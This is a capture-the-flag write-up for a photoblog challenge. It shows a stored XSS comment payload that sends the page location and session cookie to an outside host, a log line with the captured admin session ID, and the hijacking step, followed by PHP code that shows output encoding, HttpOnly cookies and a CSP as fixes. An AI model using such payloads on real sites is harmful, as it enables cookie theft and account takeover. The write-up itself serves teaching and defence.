# PhotoBlog

## Task

A friend of mine has stolen my cat's picture on his blog. I want to log in as admin user on his blog. Do you have any idea?

## Solution

The website to pwn is a photoblog where you can add comments on a cat picture.

By posting comments such as `<script>alert(123)</script>` we notice that there is an XSS vulnerability.

The admin panel is located at `admin.php`. However, when we try to access it we are redirected to `login.php`.
The XSS vulnerability can be used to get the admin's cookie in order to connect to `admin.php`.

After we posted the following comment

```html
<script>
im=document.createElement('img');
im.src="http://rainbowlyte.com/pirate.png?loc="+document.location+"&cookie="+document.cookie;
document.body.appendChild(im);
</script>
```

we got the following request in our logs.

```
213.233.185.27 - - [06/Feb/2016:14:52:07 +0100] "GET /pirate.png?loc=http://172.17.118.91:8083/privateindex.php?id=Quokka&cookie=PHPSESSID=515386866780b5f132fc96c02b3ddb82 HTTP/1.1" 404 142 "http://172.17.118.91:8083/privateindex.php?id=Quokka" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"
```

The admin's `PHPSESSID` is `515386866780b5f132fc96c02b3ddb82`.

Once we changed our cookie, we could access `admin.php` and get the flag.
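The chain above relies on two properties of the application: comments are echoed without output encoding, and the session cookie is readable from `document.cookie`. The following is an added example, not code from the original write-up or from the challenge, showing the vulnerable rendering next to a hardened form. The function names are hypothetical, and it assumes PHP 7.3+ and a site served over HTTPS.

```php
<?php
// Added example. Helper names are hypothetical; the challenge's source is not on the page.

// Start the session with a cookie that page scripts cannot read.
function start_hardened_session(): void
{
    ini_set('session.use_strict_mode', '1');  // reject IDs the server did not issue
    ini_set('session.use_only_cookies', '1'); // never take the ID from the URL
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,      // assumption: the blog is served over HTTPS
        'httponly' => true,      // PHPSESSID is no longer visible to document.cookie
        'samesite' => 'Strict',
    ]);
    session_start();
}

// Vulnerable pattern: the stored comment is emitted as markup.
function render_comment_vulnerable(string $comment): string
{
    return '<p class="comment">' . $comment . '</p>';
}

// Hardened: encode on output so the comment is rendered as text.
function render_comment(string $comment): string
{
    $safe = htmlspecialchars($comment, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p class="comment">' . $safe . '</p>';
}

// Defence in depth: disallow inline scripts and image loads from other origins.
function send_csp_header(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'");
}

if (PHP_SAPI === 'cli') {
    // Sample input: the probe comment quoted in the write-up.
    $probe = '<script>alert(123)</script>';
    echo render_comment_vulnerable($probe), PHP_EOL; // tag reaches the browser intact
    echo render_comment($probe), PHP_EOL;            // tag is entity-encoded, shown as text
}
```

`HttpOnly` only keeps the session ID away from injected script; the XSS itself is closed by the output encoding in `render_comment`.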

Original writeup (https://github.com/QuokkaLight/write-ups/blob/master/sharif-university-ctf-2016/web/PhotoBlog.md).